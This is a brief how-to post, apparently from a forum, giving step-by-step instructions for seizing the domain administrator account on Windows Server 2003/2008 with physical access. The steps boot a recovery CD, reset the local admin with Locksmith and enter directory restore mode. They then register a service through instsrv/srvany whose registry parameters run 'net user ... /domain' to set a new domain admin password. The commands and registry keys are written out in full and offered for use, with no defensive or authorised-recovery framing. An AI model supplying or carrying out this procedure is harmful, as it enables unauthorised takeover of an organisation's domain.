How to get domain administrator privilegies in Windows Server 2003 / 2008

That we need:

1. Physical access to the server
2. ERD Commander CD (or other with Locksmith utility)
3. Head + Hands

Your actions:

1. Insert CD and boot from ERD Commander
2. Use locksmith to get privilegies of local administrator
3. Reboot
4. Boot windows server in directory restore mode
5. Login with your local admin username and password
6. Put cmd.exe, srvany.exe and instsrv.exe in C:\tools (or some other directory)
7. Run cmd.exe
8. cd C:\tools
9. instsrv PassRecovery C:\tools\srvany.exe
10. Set autorun to this service (in Settings panel or write services.msc) (PassRecovery)
11. Run regedit
12. Create subfolder Parameters in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PassRecovery
13. Add keys (String): Application (C:\tools\cmd.exe) and AppParameters (/k net user administrator (name of domain administrator) Pa$$w0rd (new password, must be match to security policy) /domain)
14. example: /k net user admin Pa$$w0rd /domain
15. In service settings in tab log on enable checkbox Allow Service to interract with desktop, apply.
16. Reboot
17. Run
18. Enjoy.